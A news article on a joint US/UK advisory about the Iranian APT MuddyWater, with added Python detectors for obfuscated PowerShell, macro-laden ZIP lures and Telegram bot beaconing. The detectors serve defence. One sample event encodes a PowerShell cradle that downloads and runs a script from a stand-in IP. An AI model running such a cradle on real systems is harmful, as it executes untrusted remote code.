Posted on February 27, 2022 at 4:23 AM
Cybersecurity agencies in the U.S. and U.K. have warned that Iranian government-sponsored threat actors are targeting commercial and government networks around the world.
The joint advisory was issued by the U.K.'s National Cyber Security Centre (NCSC) and the U.S. Cybersecurity and Infrastructure Security Agency (CISA), together with the FBI and U.S. Cyber Command's Cyber National Mission Force.
According to the advisory, the advanced persistent threat (APT) group, tracked as MuddyWater, deploys malware to obtain stolen data and network access for the Iranian government. It also shares that stolen information and access with other malicious cyber actors.
In January 2022, U.S. Cyber Command publicly identified MuddyWater as a subordinate element of Iran's Ministry of Intelligence and Security (MOIS). The group targets government and private-sector organizations across Asia, Africa, Europe, and North America, including the telecommunications, defense, local government, and oil and natural gas sectors.
The wider security community also tracks MuddyWater under other names, including Seedworm, Static Kitten, TEMP.Zagros, MERCURY, and Earth Vetala. The group has conducted cyber espionage and other malicious cyber operations in support of MOIS objectives since approximately 2018. The advisory does not say how many organizations have been compromised by the latest activity.
The APT Group Utilizes Different Open-Source Tools
Besides exploiting publicly reported vulnerabilities, the group uses open-source tools and techniques to gain access to sensitive data on victims' systems and to deploy ransomware.
In January 2022, Cisco Talos reported an earlier MuddyWater campaign against Turkish government institutions and private organizations that delivered a PowerShell-based backdoor.
The activity described by the U.S. and U.K. agencies follows the same pattern: the actors use obfuscated PowerShell scripts to hide the most damaging parts of the attack, including its command-and-control (C2) functions, so that an intrusion can go undetected for an extended period.
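As an added example (not code from the advisory or from any of the agencies), here is a triage script that scores PowerShell process-creation events for the obfuscation tricks described above: -EncodedCommand payloads (decoded so the hidden cradle can be read), hidden windows, profile and execution-policy bypass, string splitting, [char] casting, download cradles and unusually high entropy. The event lines, host names and the 198.51.100.7 address are constructed for the example; the indicator list and the threshold are this example's own choices, not the advisory's.

```python
import base64
import math
import re
from dataclasses import dataclass, field

# Constructed sample process-creation events (hypothetical; not taken from the advisory).
# Format of each line: "<timestamp> <host> <parent-image> <command-line>".
ENC_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/s.ps1')".encode("utf-16le")
).decode()
SAMPLE_EVENTS = [
    "2022-02-20T10:01:02Z ws01 explorer.exe powershell.exe -NoProfile -Command Get-ChildItem C:\\Temp",
    f"2022-02-20T10:05:17Z ws01 excel.exe powershell.exe -w hidden -nop -ep bypass -enc {ENC_PAYLOAD}",
    "2022-02-20T10:06:44Z ws02 wscript.exe powershell.exe -nop -w 1 -c "
    "\"$a='Inv'+'oke-Ex'+'pression';&$a ([char]73+[char]69+[char]88)\"",
    "2022-02-20T10:07:10Z ws03 cmd.exe powershell.exe -File C:\\Scripts\\backup.ps1",
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the payload is base64 of UTF-16LE text.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Each indicator is cheap and noisy on its own; the verdict comes from how many co-occur.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|1)\b", re.I),
    "noprofile_plus_bypass": re.compile(r"-nop(?:rofile)?\b.*-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "string_splitting": re.compile(r"'[^']{1,6}'\s*\+\s*'"),
    "char_casting": re.compile(r"\[char\]\s*\d+", re.I),
    "download_cradle": re.compile(
        r"DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|Net\.WebClient|Invoke-WebRequest", re.I
    ),
}
ENTROPY_THRESHOLD = 5.0   # bits per character; ordinary admin command lines sit well below this
SUSPICIOUS_THRESHOLD = 2  # number of co-occurring indicators that escalates an event


@dataclass
class Verdict:
    host: str
    parent: str
    indicators: list = field(default_factory=list)
    decoded: str = ""  # recovered -EncodedCommand text, for the analyst

    @property
    def suspicious(self) -> bool:
        return len(self.indicators) >= SUSPICIOUS_THRESHOLD


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character; long base64 blobs push this up."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def decode_encoded_command(cmdline: str) -> str:
    """Return the UTF-16LE text behind -EncodedCommand, or '' if absent or undecodable."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", errors="replace")
    except ValueError:  # binascii.Error is a ValueError
        return ""


def score_event(line: str) -> Verdict:
    _ts, host, parent, cmdline = line.split(" ", 3)
    decoded = decode_encoded_command(cmdline)
    hits = ["encoded_command"] if decoded else []
    # Scan the raw command line and the decoded payload together, so a cradle
    # hidden behind -enc is still caught.
    text = cmdline + "\n" + decoded
    hits += [name for name, rx in INDICATORS.items() if rx.search(text)]
    if shannon_entropy(cmdline) > ENTROPY_THRESHOLD:
        hits.append("high_entropy")
    return Verdict(host, parent, hits, decoded)


def triage(events) -> list:
    """Events worth an analyst's attention, in log order."""
    return [v for v in map(score_event, events) if v.suspicious]


if __name__ == "__main__":
    for v in triage(SAMPLE_EVENTS):
        print(f"{v.host} {v.parent}: {', '.join(v.indicators)}")
        if v.decoded:
            print("  decoded:", v.decoded)
```

Two design points: the decoded payload is appended to the text being scanned, because the cradle in the second sample is invisible in the raw command line; and no single indicator fires an alert, since hidden windows and encoded commands are common in legitimate scheduled tasks and management tooling. The parent image (excel.exe, wscript.exe) is carried in the verdict because an Office or script host spawning PowerShell is the strongest corroborating signal for the phishing chain described later in the article.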
The Hackers Use Spear-Phishing Campaigns
The agencies observed that the intrusions are facilitated by spear-phishing campaigns that try to coax targets into downloading ZIP archives. Each archive contains either an Excel file with a malicious macro or a PDF that drops a malicious payload onto the target system.
The agencies also observed that the group uses several different malware sets in its campaigns, which gives the operation redundancy: if one set is detected by security software, the others can continue operating.
These sets include POWERSTATS, Mori, Small Sieve, and PowGoop, which between them handle loading further malware, providing backdoor access, and exfiltrating data.
Small Sieve is a Python-based implant used to maintain and expand a foothold in a network, while PowGoop is a loader that downloads and executes second-stage PowerShell scripts.
Both help the actors stay in the affected systems longer and avoid detection. Small Sieve in particular communicates with its C2 through the Telegram Bot API, so its beaconing looks like ordinary HTTPS traffic to a popular, legitimate service and is hard for security software to distinguish from benign use.
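Added example, not from the advisory: an inbound-attachment check for exactly this lure shape. It opens a ZIP, flags Office documents that carry a VBA project (checked by content rather than extension, since an .xlsm is itself a ZIP containing xl/vbaProject.bin), and flags PDFs carrying auto-run or embedded-content objects. The archive it inspects is constructed in build_sample_attachment; the file names and the PDF inside are made up for the example and nothing in it is a real sample.

```python
import io
import zipfile
from dataclasses import dataclass, field

MAX_MEMBER_BYTES = 20 * 1024 * 1024  # do not inflate anything larger (zip-bomb guard)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"  # legacy .xls/.doc container header
# PDF name objects that commonly carry auto-run or embedded content in lure documents.
PDF_MARKERS = (b"/OpenAction", b"/JavaScript", b"/JS", b"/Launch", b"/EmbeddedFile")
OFFICE_EXT = {"xls", "xlsx", "xlsm", "xlsb", "doc", "docx", "docm", "ppt", "pptx", "pptm"}
SCRIPT_EXT = {"exe", "scr", "dll", "js", "jse", "vbs", "wsf", "hta", "lnk", "bat", "cmd", "ps1"}


@dataclass
class Finding:
    name: str
    reasons: list = field(default_factory=list)

    @property
    def flagged(self) -> bool:
        return bool(self.reasons)


def inspect_office(data: bytes) -> list:
    """Flag VBA inside an Office document without trusting its extension."""
    if data.startswith(OLE_MAGIC):
        return ["legacy OLE2 document; parse its VBA streams before delivery"]
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as doc:
            names = [n.lower() for n in doc.namelist()]
    except zipfile.BadZipFile:
        return ["Office extension but neither OOXML nor OLE2"]
    reasons = []
    if any(n.endswith("vbaproject.bin") for n in names):
        reasons.append("contains VBA project (macro)")
    if any("externallinks/" in n for n in names):
        reasons.append("contains external workbook links")
    return reasons


def inspect_pdf(data: bytes) -> list:
    if not data.startswith(b"%PDF"):
        return [".pdf extension but no PDF header"]
    return [f"PDF contains {m.decode()}" for m in PDF_MARKERS if m in data]


def inspect_zip_attachment(zip_bytes: bytes) -> list:
    """One Finding per archive member; Finding.flagged is True when something needs review."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as archive:
        for info in archive.infolist():
            if info.is_dir():
                continue
            finding = Finding(info.filename)
            findings.append(finding)
            # file_size is the declared uncompressed size; ZipFile stops reading at it.
            if info.file_size > MAX_MEMBER_BYTES:
                finding.reasons.append("member too large to inspect safely")
                continue
            ext = info.filename.lower().rsplit(".", 1)[-1] if "." in info.filename else ""
            data = archive.read(info)
            if ext in OFFICE_EXT:
                finding.reasons += inspect_office(data)
            elif ext == "pdf":
                finding.reasons += inspect_pdf(data)
            elif ext in SCRIPT_EXT:
                finding.reasons.append(f"executable or script content (.{ext}) in archive")
    return findings


def _zip_of(members: dict) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        for name, data in members.items():
            z.writestr(name, data)
    return buf.getvalue()


def build_sample_attachment() -> bytes:
    """Constructed lure archive (not a real sample): a macro workbook, a clean workbook, a PDF with an open action."""
    macro_xlsm = _zip_of({
        "[Content_Types].xml": b"<Types/>",
        "xl/workbook.xml": b"<workbook/>",
        "xl/vbaProject.bin": OLE_MAGIC + b"\x00" * 64,  # a real vbaProject.bin is an OLE2 container
    })
    clean_xlsx = _zip_of({"[Content_Types].xml": b"<Types/>", "xl/workbook.xml": b"<workbook/>"})
    lure_pdf = (
        b"%PDF-1.4\n1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
        b"2 0 obj << /S /JavaScript /JS (app.alert('hypothetical')) >> endobj\n%%EOF\n"
    )
    return _zip_of({"invoice.xlsm": macro_xlsm, "summary.xlsx": clean_xlsx, "contract.pdf": lure_pdf})


if __name__ == "__main__":
    for f in inspect_zip_attachment(build_sample_attachment()):
        print(("FLAG " if f.flagged else "ok   ") + f.name, "; ".join(f.reasons))
```

The PDF check is a byte-level heuristic in the spirit of pdfid: it tells you a document deserves a sandbox detonation, not that it is malicious, and it will miss names split across object streams or encoded with hex escapes. The Office check is more reliable because OOXML cannot carry VBA without a vbaProject.bin part; legacy OLE2 files are only flagged for deeper parsing.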
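Added example (not from the advisory or the agencies): detection logic for Bot API beaconing in web-proxy logs, which applies to any implant using a Telegram bot for C2, not only Small Sieve. It groups requests to api.telegram.org by client and bot id, flags clients that poll getUpdates on a regular schedule and clients that move files through the bot, and keeps the bot token out of the alert. The log lines, addresses, bot ids and token are constructed for the example.

```python
import re
import statistics
from dataclasses import dataclass, field
from datetime import datetime

# Bot API calls look like /bot<bot-id>:<token>/<method>. The token is a credential,
# so it is captured only to match the path and is never copied into an alert.
BOT_PATH = re.compile(r"^/bot(\d+):([A-Za-z0-9_-]{20,})/(\w+)")
FILE_METHODS = {"sendDocument", "sendPhoto", "getFile"}  # how an implant moves files through the bot

# Constructed proxy log (hypothetical; not from the advisory).
# Format: "<timestamp> <src-ip> <method> <host> <path> <user-agent>"
SAMPLE_TOKEN = "AAHfakefakefakefakefakefakefakefakefake"
SAMPLE_PROXY_LOG = [
    "2022-02-20T10:00:00 10.1.2.5 GET telegram.org / Mozilla/5.0 (Windows NT 10.0) Firefox/97.0",
    f"2022-02-20T10:00:00 10.1.2.3 GET api.telegram.org /bot5123456789:{SAMPLE_TOKEN}/getUpdates python-requests/2.27.1",
    f"2022-02-20T10:00:30 10.1.2.3 GET api.telegram.org /bot5123456789:{SAMPLE_TOKEN}/getUpdates python-requests/2.27.1",
    f"2022-02-20T10:01:00 10.1.2.3 GET api.telegram.org /bot5123456789:{SAMPLE_TOKEN}/getUpdates python-requests/2.27.1",
    f"2022-02-20T10:01:31 10.1.2.3 GET api.telegram.org /bot5123456789:{SAMPLE_TOKEN}/getUpdates python-requests/2.27.1",
    f"2022-02-20T10:02:00 10.1.2.3 POST api.telegram.org /bot5123456789:{SAMPLE_TOKEN}/sendDocument python-requests/2.27.1",
    f"2022-02-20T10:03:00 10.1.2.9 GET api.telegram.org /bot9876543210:{SAMPLE_TOKEN}/getMe curl/7.81.0",
]


@dataclass
class BotSession:
    src: str
    bot_id: str
    times: list = field(default_factory=list)
    methods: list = field(default_factory=list)


def parse_sessions(lines) -> list:
    """Group Bot API requests by (client, bot id); everything else is ignored."""
    sessions = {}
    for line in lines:
        ts, src, _http_method, host, path, _ua = line.split(" ", 5)
        if host.lower() != "api.telegram.org":
            continue
        m = BOT_PATH.match(path)
        if not m:
            continue
        bot_id, _token, api_method = m.groups()
        s = sessions.setdefault((src, bot_id), BotSession(src, bot_id))
        s.times.append(datetime.fromisoformat(ts))
        s.methods.append(api_method)
    return list(sessions.values())


def assess(session: BotSession, min_requests: int = 3, max_jitter: float = 0.25) -> list:
    """Reasons this session looks like an implant rather than an incidental request."""
    reasons = []
    times = sorted(session.times)
    gaps = [(later - earlier).total_seconds() for earlier, later in zip(times, times[1:])]
    if len(times) >= min_requests:
        mean = statistics.mean(gaps)
        # Low relative spread between requests is the fingerprint of a polling loop.
        if mean > 0 and statistics.pstdev(gaps) / mean <= max_jitter:
            reasons.append(f"regular polling about every {mean:.0f}s over {len(times)} requests")
    used = FILE_METHODS & set(session.methods)
    if used:
        reasons.append("file transfer via " + ", ".join(sorted(used)))
    return reasons


def find_beacons(lines) -> dict:
    """Map (src-ip, bot-id) to reasons, for sessions with at least one reason."""
    result = {}
    for s in parse_sessions(lines):
        reasons = assess(s)
        if reasons:
            result[(s.src, s.bot_id)] = reasons
    return result


if __name__ == "__main__":
    for (src, bot_id), reasons in find_beacons(SAMPLE_PROXY_LOG).items():
        print(f"{src} -> bot {bot_id}: " + "; ".join(reasons))
```

Caveat: api.telegram.org is reached over HTTPS, so the path and API method are only visible at a proxy that terminates TLS. Without inspection you see only the SNI or host, and the fallback is to run the same periodicity test over connection timestamps alone; assess supports that, since it needs only the times and treats an empty method list as no file-transfer evidence.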
The APT Group Shows A High Level Of Sophistication
The group also uses other malware. One piece is a Windows Script File (.WSF), tracked in the advisory as Canopy (also known as Starwhale), that collects system metadata and transmits it to an adversary-controlled IP address.
POWERSTATS and Mori are backdoors that the actors use to run commands received from the C2 and to maintain access to the affected system.
MuddyWater also uses an arsenal of other tools to remain persistent on affected devices and systems for as long as possible. The agencies observed the group using a survey script that transmits information about the victim's computer to the C2 server, where the actors use it to decide how to proceed with the attack.
A newly identified PowerShell backdoor is also deployed, which is used by the actors to execute commands.
Organizations Should Implement Security Measures
The agencies recommend several steps that organizations can take to protect their systems and avoid becoming victims of this wave of attacks.
They recommend using multi-factor authentication wherever applicable, which raises the cost of credential-based attacks. Organizations should also limit the use of administrator privileges and patch known exploited vulnerabilities as soon as possible. Finally, the agencies advise implementing phishing protections, which have proven effective at keeping these threat actors out.